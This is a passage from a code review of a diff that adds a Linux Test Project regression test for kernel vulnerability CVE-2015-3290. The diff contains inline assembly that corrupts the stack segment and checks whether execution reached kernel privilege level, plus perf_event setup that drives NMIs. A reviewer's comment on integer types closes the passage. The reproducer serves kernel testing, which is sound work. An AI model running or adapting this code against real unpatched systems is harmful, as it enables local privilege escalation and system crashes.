testcases/cve/cve-2015-3290.c

```diff
@@ -0,0 +1,579 @@
+		      "mov    %%ebp, %%esi    \n\t"
+		      "mov    $2048, %%ebp    \n\t"
+
+		      /* Save rsp for diagnostics */
+		      "mov    %%esp, %[expected_rsp] \n\t"
+
+		      /*
+		       * Let 'er rip.
+		       */
+		      "mov    %[ss], %%ss \n\t"   /* begin corruption */
+		      "movl   $1000, %%edx    \n\t"
+		      "1:  .byte 0xff, 0xca   \n\t"   /* decl %edx */
+		      "jnz    1b      \n\t"
+		      "mov    %%ss, %%eax \n\t"   /* grab SS to display */
+
+		      /* Did we enter CPL0? */
+		      "mov    %%cs, %%dx  \n\t"
+		      "testw  $3, %%dx    \n\t"
+		      "jnz    2f      \n\t"
+		      ".code64	\n\t"
+		      "incl   cpl0(%%rip) \n\t"
+		      "leaq   3f(%%rip), %%rcx \n\t"
+		      "movl   $0x200, %%r11d  \n\t"
+		      "sysretl	\n\t"
+		      ".code32	\n\t"
+		      "2:	     \n\t"
+
+		      /*
+		       * Stop further corruption.  We need to check CPL
+		       * first because we need RPL == CPL.
+		       */
+		      "mov    %[orig_ss], %%ss \n\t"  /* end corruption */
+
+		      "pushf	  \n\t"
+		      "testl  $(1<<9),(%%esp)   \n\t"
+		      "addl   $4, %%esp   \n\t"
+		      "jz 3f      \n\t"
+		      "cmpl   %[ss], %%eax    \n\t"
+		      "je 4f      \n\t"
+		      "3:  int3	   \n\t"
+		      "4:  mov %%esi, %%ebp   \n\t"
+		      : [expected_rsp] "=m" (expected_rsp)
+		      : [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
+			 : "eax", "ecx", "edx", "esi", "flags"
+		);
+#endif
+
+		/*
+		 * If we ended up with IF == 0, there's no easy way to fix
+		 * it.  Instead, make frequent syscalls to avoid hanging
+		 * the system.
+		 */
+		syscall(0x3fffffff);
+	}
+}
+
+static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
+			   int cpu, int group_fd, unsigned long flags)
+{
+	int ret;
+
+	ret = ltp_syscall(__NR_perf_event_open, hw_event, pid, cpu,
+			  group_fd, flags);
+	return ret;
+}
+
+static int event_mlock_kb;
+static int max_sample_rate;
+
+static void setup(void)
+{
+        /*
+         * According to perf_event_open's manpage, the official way of
+         * knowing if perf_event_open() support is enabled is checking for
+         * the existence of the file /proc/sys/kernel/perf_event_paranoid.
+         */
+	if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1)
+		tst_brk(TCONF, "Kernel doesn't have perf_event support");
+
+	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb",
+			"%d", &event_mlock_kb);
+	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate",
+			"%d", &max_sample_rate);
+}
+
+static void run(void)
+{
+	struct perf_event_attr pe = {
+		.size = sizeof(struct perf_event_attr),
+		.disabled = 0,
+		.exclude_kernel = 0,
+		.exclude_hv = 0,
+		.freq = 1,
+		.sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID|
+			PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN|
+			PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD,
+	};
+	/* Workaround bug in GCC 4.4.7 (CentOS6) */
+	pe.sample_freq = max_sample_rate / 5;
+
+	struct {
+		__u32 type;
+		__u64 config;
+		const char *name;
```

Comment:
The types with double underscore are kernel ones, you should be using uint32_t, etc. from stdint.h in user space instead.